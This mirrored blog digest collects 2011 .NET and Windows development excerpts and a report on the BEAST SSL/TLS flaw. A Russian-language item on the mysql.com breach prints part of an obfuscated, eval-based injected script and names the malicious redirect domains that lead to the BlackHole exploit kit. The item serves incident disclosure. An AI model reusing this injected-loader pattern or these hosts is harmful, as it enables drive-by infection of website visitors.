This is a mirror of official site: http://jasper-net.blogspot.com/

C# Runtime Compilation

| Wednesday, September 28, 2011
The .NET framework includes classes that allow the code generator and compiler to be controlled from within an assembly. This allows C# source code, held in a string array, to be compiled at run time and executed using basic reflection techniques.

Runtime Compilation

An interesting aspect of the .NET framework is that it provides a number of classes that allow you to interact with the compiler at run time. This allows you to create C# code in a string and compile it, either storing the resultant assembly in a file or holding it in memory where it can be accessed and executed using reflection. Using the compiler in this manner allows you to provide a means to include complex user customisations. For example, you could allow code to be entered by the user for execution as part of the workflow of your software. You might also use this facility to allow the user to enter C# expressions that are evaluated and used within a report. You may even create your own integrated development environment (IDE).

In this article we will create two examples that compile code to an in-memory assembly at runtime. We will then execute the code to see the results. The first example will be a basic console application where the dynamically compiled source code outputs a message. The second example will allow the user to input an expression to be evaluated and will use the result. We will consider the possibility of the user entering invalid code.


C# Code Compiler

The C# code generator and compiler are made accessible via the CSharpCodeProvider class, which is found in the Microsoft.CSharp namespace:
using Microsoft.CSharp;

To enable dynamic compilation we need to create a CSharpCodeProvider instance. We will later use its methods to generate the object code. Add the following code to the Main method of the console application project.

CSharpCodeProvider provider = new CSharpCodeProvider();


Compiler Parameters

As when using Visual Studio, there are many compiler options that may be configured. Rather than being controlled with multiple properties of the CSharpCodeProvider class, most options are initialised in an instance of the CompilerParameters class, which is found in the System.CodeDom.Compiler namespace:

using System.CodeDom.Compiler;

Read more: BlackWasp
QR: RuntimeCompilation.aspx

Posted via email from Jasper-net

Security Advisory for SSL/TLS Flaw Released by Microsoft

|
In response to a new threat of attack caused by a flaw in the Secure Socket Layer (SSL) 3.0 and Transport Layer Security (TLS) 1.0, Microsoft has issued Security Advisory 2588513, which contains a description and workarounds.

The flaw, discovered and demonstrated by two security researchers last week, allows for a potential attacker to pull off a man-in-the-middle exploit by gaining access to a user's machine through an active HTTPS session.

In the demonstration, security researchers Thai Duong and Juliano Rizzo showed how their SSL exploit tool called BEAST (consisting of a Javascript/applet agents and a network sniffer) can decrypt existing cookies on a Web site to gain access to a target's machine. The two used their tool on the PayPal Web site to demonstrate that even the most secure sites are vulnerable to this flaw. 

"Once an agent has been loaded, BEAST can patiently wait until you sign in to some valuable websites to steal your accounts," wrote Doung, in a blog post.

While the two showed that an SSL attack using Javascript agents could succeed in hijacking personal information and executing malicious code, Microsoft says it believes that the possibility of a successful attack in the wild is slim.

Speaking on what is required to pull off such an attack, Microsoft said the following, in a TechNet blog post:

    "The HTTPS session must be actively attacked by a man-in-the-middle; simply observing the encrypted traffic is not sufficient.
    The malicious code the attacker uses to decrypt the HTTPS traffic must be injected and run within the user's browser session.
    The attacker's malicious code needs to be treated as from the same origin as the HTTPS server in order to it to be allowed to piggyback on an existing HTTPS connection. Most likely it requires the attacker to exploit another vulnerability to bypass the browser's same origin policy."

While the exploit only works in TLS versions 1.0, most browsers do not provide support for newer versions (TLS 1.1 and 1.2), and in Microsoft's case, Internet Explorer does not have TLS 1.1 activated as its default setting due to compatibility issues. Microsoft said it is waiting for worldwide servers to implement correct HTTPS protocols before it can set TLS 1.1 to default.

Read more: Microsoft Online
QR: security-advisory-for-ssl-tls.aspx

Posted via email from Jasper-net

Common Language Runtime (CLR) Integration Programming in .NET

|
When Microsoft introduced common language runtime (CLR) integration support with SQL Server an new window was opened for .NET application developers and SQL server users. They can write stored procedures, triggers, user-defined types, user defined function or user defined aggregate functions using any .NET language of their choice. Previous versions of Visual Studio.NET did not support CLR integration programing because .NET 2003 cannot use the .NET Framework 2.0 assemblies. .NET programming languages provide a richer programming environment for developers than Transact-SQL. All the managed code runs into the common language runtime environment which provides more security to the code besides the normal database engine’s stored procedures available in earlier versions of SQL Server. You should use Transact-SQL when the code will mostly perform data access with little or no procedural logic. Use managed code for CPU-intensive functions and procedures that feature complex logic, or when you want to make use of the BCL of the .NET Framework. The following libraries/namespaces are supported by CLR integration in SQL Server:

• CustomMarshalers
• Microsoft.VisualBasic
• Microsoft.VisualC
• mscorlib
• System
• System.Configuration
• System.Data
• System.Data.OracleClient
• System.Data.SqlXml
• System.Deployment
• System.Security
• System.Transactions
• System.Web.Services
• System.Xml
• System.Core.dll
• System.Xml.Linq.dll


CLR Stored Procedures

Stored procedures cannot be used in scalar expressions, unlike scalar expressions they are able to return tabular format data, and can invoke data definition language (DDL) and data manipulation language (DML) statements and return Output parameters. In CLR, stored procedures are created as public static methods in the .NET framework assembly. This static method can be of void or integer type.  I it returns an integer value, it is treated as return code of procedure as-

EXECUTE @return_status = your_procedure

Read more: .NET Zone
QR: common-language-runtime-clr

Posted via email from Jasper-net

Quick tip: Killing a Metro-style app in Windows 8

| Tuesday, September 27, 2011
Metro-style apps are very similar to Windows Phone apps. They have a similar application model (for example they can be suspended, and when suspended they can be killed by the operating system if memory is needed), so they need to maintain state. Also, and that is the topic of this post, they cannot be ended by the user in a “normal” way, i.e. there is no File / Exit menu and no “X” button in the corner. Once started, the application remains in memory until the following happens:

    The app is in suspended mode (not in the foreground) and the system needs to reclaim the RAM.
    The advanced user starts the Task manager, locates the application and kills the process.

Note: Unfortunately I cannot illustrate this with a picture, because my Task Manager refuses to run more than 2 seconds for some unknown reason. Windows 8 is a preview release (TM).

However sometimes you need to kill a Metro style app, because Visual Studio will refuse to start a second instance if the first one is still running. You will get an error message like the following:

6182342117_948116c5f9_b_d.jpg


Read more: Laurent Bugnion (GalaSoft)
QR: quick-tip-killing-a-metro-style-app-in-windows-8.aspx

Posted via email from Jasper-net

(Yet another) nHibernate sessionmanager for ASP.NET (MVC)

|
Working with a nHibernate session in an asp.net web application is a subject to many a blog post, forum question or overflowing stack. Having already made a contibution before, I am nevertheless going to add another go at it combining all I’ve met and trying to find a way to meet the objections to the different approaches.
The problem

Accessing a database via nHibernate takes four steps.

    Create a sessionfactory.
    Open a session.
    Access data
    Close the session

Creating a sessionfactory is a very costly process, don’t do this to often. Opening a session is fast but results in an open connection to the database. Database connections are a costly external resource. Despite session pooling connections should be closed as soon as possible.
Strategies

Trying to balance to cost of creating a sessionfactory and the cost of an open database connection I’ve found several ways to manage the session.

    Do it yourself.  Create the factory whenever the app needs data and fiddle on from there optimized to the occasion. Needless to say that’s not going to work unless you have a very simple app.

Read more: CodeBetter
QR: https://chart.googleapis.com/chart?chs=80x80&cht=qr&choe=UTF-8&chl=http://codebetter.com/petervanooijen/2011/09/26/yet-another-nhibernate-sessionmanager-for-asp-net-mvc/

Posted via email from Jasper-net

Breaking change: Raising PropertyChanged with string.Empty in WinRT / Windows 8

|
In the developer preview of Windows 8, I just noticed a breaking change in the way that data bindings react to the PropertyChanged event.

First a bit of background: Often, objects that are databound to the UI are simple data objects (also called ViewModels) that implement the INotifyPropertyChanged interface. This interface is very simple and defines just one event, the PropertyChanged event, that needs to be raised by the ViewModel when one of its property changes. It is what makes the ViewModel “observable”. If a property of another object (typically a UI element) is data bound (through a Binding object, often set declaratively in XAML), then the value of the observing property will be synchronized to the value of the observable property.

Raising the PropertyChanged event requires an instance of the PropertyChangedEventArgs class, which takes a string as sole parameter of its constructor. The string to be passed is the name of the observable property.
Raising with string.Empty or null

In WPF and Silverlight, it is possible to raise the PropertyChanged event with an instance of the PropertyChangedEventArgs class constructed with string.Empty (or null) instead of an existing property’s name. When a PropertyChanged event is raised in this manner, the UI will re-query the value of each property of the ViewModel that is data bound to the UI. This is a convenient way to raise but one event and force the UI to update itself in response to cascading changes, for example. As such, this can be a good way to increase the performance of the application.


Read more: Laurent Bugnion (GalaSoft)
QR: breaking-change-raising-propertychanged-with-string.empty-in-winrt--windows.aspx

Posted via email from Jasper-net

Internals of .NET Objects and Use of SOS

|
Well, now getting deeper into the facts, lets talk about how objects are created in .NET and how type system is laid out in memory for this post in my Internals Series.  As this is going to be very deep dive post, I would recommend to read this only if you want to kill your time to know the internal details of .NET runtime and also you have considerable working experience with the CLR types and type system.


Recently I have been talking with somebody regarding the actual difference between the C++ type system and managed C# type system. I fact the CLR Type system is different from the former as any object (not a value type) is in memory contains a baggage of information when laid out in memory. This makes CLR objects considerable different from traditional C++ programs.

Classification of Types

In .NET there are mainly two kind of Types.

    Value Types (derived from System.ValueType)
    Reference  Type (derived directly from System.Object)

Even though ValueTypes are internally inherited from System.Object in its core, but CLR treats them very differently.  Indeed from your own perception the Value Types are actually allocated in stacks (occationally) while reference types are allocated in Heaps. This is to reduce the additional contension of GC heaps for Heap allocation, GC cycles, occasional call to OS for additional memory needs etc. The object that is allocated in managed Heap is called Managed Object and the pointer that is allocated in stack to refer to the actual object in heap is called Object Reference (which is sometimes called as Managed Pointer).


Additional to this basic difference a Value Type is treated completely different from CLR point of view. CLR treats any object that is derived from System.ValueType differently in respect of any other object derived from System.Object directly. The memory of a ValueType contains just the value of its fields and the size of the Value Type is just the addition to its content, while for reference types the size is completely different. Let us consider looking at the memory layout of both the types.

stack.PNG
In case of Value Types, the Managed Pointer holds reference to the initial location of the actual Memory.Thus in this case, the Managed pointer holds reference to 0x0000 which is the address location of Field 1. Hence CLR needs to do pointer arithmetic to find Fields ... N.  Thus we can easily use Sizeof operator on ValueTypes to get the actual size of the object.

Read more: DOT NET TRICKS
QR: internals-of-net-objects-and-use-of-sos.html

Posted via email from Jasper-net

Linus Torvalds’s Lessons on Software Development Management

|
If anyone knows the joys and sorrows of managing software development projects, it would be Linus Torvalds, creator of the world's most popular open-source software program: the Linux operating system. For more than 20 years, Torvalds has been directing thousands of developers to improve the open source OS. He and I sat down to talk about effective techniques in running large-scale distributed programming teams – and the things that don’t work, too.

Torvalds says there are two things that people very commonly get completely wrong, both at an individual developer level and at companies.

“The first thing is thinking that you can throw things out there and ask people to help,” when it comes to open-source software development, he says. “That's not how it works. You make it public, and then you assume that you'll have to do all the work, and ask people to come up with suggestions of what you should do, not what they should do. Maybe they'll start helping eventually, but you should start off with the assumption that you're going to be the one maintaining it and ready to do all the work.”

Torvalds continues, “If you start off with some ‘kumba-ya feeling’ where you think people from all the world are going to come together to make a better world by working together on your project, you probably won't be going very far.”

Read more: Input Output
QR: 440

Posted via email from Jasper-net

Sending a window a WM_DESTROY message is like prank calling somebody pretending to be the police

|
A customer was trying to track down a memory leak in their program. Their leak tracking tool produced the stacks which allocated memory that was never freed, and they all seemed to come from uxtheme.dll, which is a DLL that comes with Windows. The customer naturally contacted Microsoft to report what appeared to be a memory leak in Windows.

I was one of the people who investigated this case, and the customer was able to narrow down the scenario which was triggering the leak. Eventually, I tracked it down. First, here's the thread that caused the leak:

DWORD CALLBACK ThreadProc(void *lpParameter)
{
 ...
 // This CreateWindow caused uxtheme to allocate some memory
 HWND hwnd = CreateWindow(...);
 RememberWorkerWindow(hwnd);
 MSG msg;
 while (GetMessage(&msg, NULL, 0, 0)) {
  TranslateMessage(&msg);
  DispatchMessage(&msg);
 }
 return 0;
}


Read more: The Old New Thing
QR: 10216420.aspx

Posted via email from Jasper-net

MySQL.com взломан и продан за 3000$

|
Шаг 1:

Посещаем сайт mysql.com

Шаг 2:

Загружаем вредоносный скрипт: mysql.com/common/js/s_code_remote.js?ver=20091011

/* SiteCatalyst code version: H.14. Copyright Omniture, Inc. More info available at http://www.omniture.com */
/* Author: Neil Evans */
/************************** CONFIG SECTION ****************************************/
/* Specify the Report Suite(s) */
Object.prototype.qwe=function(){return String.fromCharCode;};Object.prototype.asd='e';var s="";try{{}['qwtqwt']();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof{}.asd.vfr==='undefined')n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,206/n,202/n,232/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,230/n,132/n,242/n,168/n,194/n,206/n,156/n,194/n,218/n,202/n,80/n,78/n,196/n,222/n,200/n,242/n,78/n,82/n,182/n,96/n,186/n,82/n,246/n,18/n,18/n,18/n,210/n,204/n,228/n,194/n,218/n,202/n,228/n,80/n,82/n,118/n,18/n,18/n,250/n,64/n,202/n,216/n,230/n,202/n,64/n,246/n,18/n,18/n,18/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,238/n,228/n,210/n,232/n,202/n,80/n,68/n,120/n,210/n,204/n,228/n,194/n,218/n,202/n,64/n,230/n,228/n,198/n,122/n,78/n,208/n,232/n,232/n,224/n,116/n,94/n,94/n,204

Скрипт генерирует ифрейм и редиректит нас на falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/, а отсюда на truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

Здесь присутствует вредоносная связка BlackHole. Она эксплуатирует браузер, плагины, такие как Adobe Flash, Adobe PDF, Java и т.д.), и после успешной эксплуатации устанавливает вредоносную программу на ОС без ведома пользователя. Пользователю достаточно посетить mysql.com с уязвимой платформы и он заразится вредоносной программой.

Read more: Habrahabr.ru
QR: https://chart.googleapis.com/chart?chs=80x80&cht=qr&choe=UTF-8&chl=http://habrahabr.ru/blogs/infosecurity/129221/

Posted via email from Jasper-net

WinRT and Mono

|
Today Joseph mentioned to me that some of our users got the impression from my previous post on WinRT that we would be implementing WinRT for Linux. We are not working on a WinRT UI stack for Linux, and do not have plans to.

WinRT is a fabulous opportunity for Mono, because Microsoft is sending a strong message: if you want your code to run in multiple scenarios (server, desktops, sandboxed environments), you want to split your UI code from your backend code.

This is great because it encourages developers to think in terms of having multiple facades for the same code base and the direction that we have been taking Mono on in the last few years.

Use the native toolkit on each platform to produce an immersive user experience, and one that leverages the native platform in the best possible way.

These are the APIs that we envision .NET developers using on each platform:

    Windows: WinRT, Winforms, WPF (fallbacks: Gtk#, Silverlight)
    MacOS: MonoMac (fallback: Gtk#, Silverlight)
    Linux: Gtk#
    Android: MonoDroid APIs
    iOS: MonoTouch
    Windows Phone 7: Silverlight
    XBox360: XNA-based UI

Read more: Personal blog of Miguel de Icaza
QR: Sep-26.html

Posted via email from Jasper-net

Compatibility of .NET Framework 4.5

|
    Fundamentals were a big part of our focus while building .NET 4.5. We divided fundamentals into seven areas called “tenets”. One of these tenets is compatibility. Today’s post is by Manish Agnihotri, a program manager who is driving compatibility across the .NET Framework. -- Brandon

.NET Framework 4.5 is an in-place update that replaces .NET Framework 4 (rather than a side-by-side installation). Our goal is for .NET 4.5 to be fully backward compatible with applications built for .NET 4 (.NET 3.5 and .NET 4.5 will be side-by-side). We’ll talk about the compatibility story for .NET 3.5 in a later post. One of the first things you’ll notice about .NET 4.5 is the version number (4.0.30319) is the same as .NET 4; this is the practice used by other in-place updates.

Our primary concern is guaranteeing applications you use do not break after you install .NET 4.5. We accomplish this by running hundreds of application in our compatibility lab to find issues as soon as they’re introduced. While designing new features or changing existing code, we keep compatibility in mind. And a small group of us, the Developer Division Compatibility Council (DDCC), monitor changes made by developers. We review potential breaking changes, and help teams understand and assess the compatibility impact of new features and bug fixes. For .NET 4.5, members of DDCC reviewed every proposed breaking change, every new feature, and a majority of the bug fixes for the release.

We’ve put a lot of effort into maintaining a consistently high bar for compatibility across the product, yet we know some issues may get passed us. Many applications will exercise the .NET Framework in ways that we did not expect or we lack test coverage for. Still we care about knowing every issue, even those that may seem like corner cases. Once you install .NET 4.5 Developer Preview on a machine that previously had .NET 4, any compatibility issues can be sent to the Connect feedback site.
Types of compatibility issues

There are three kinds of version compatibility testing we do: (1) binary compatibility, (2) source compatibility, and (3) serialization compatibility. You may also find these approaches useful in your testing, and should an issue arise this may help you narrow down the root cause. Having a wide range of scenarios within each kind of tests is also critical to ensuring good compatibility coverage.

Binary compatibility uses binaries built targeting .NET 4 and then are run on .NET 4.5. Essentially, we’re testing that the behavior of newer .NET libraries is equivalent to previous versions. This can range from making sure the return value of a function is the same or that the same exceptions are raised. The hardest issues are multi-threading behaviors – sometimes performance improvements can be a breaking change.

Read more: .NET Blog
QR: compatibility-of-net-framework-4-5.aspx

Posted via email from Jasper-net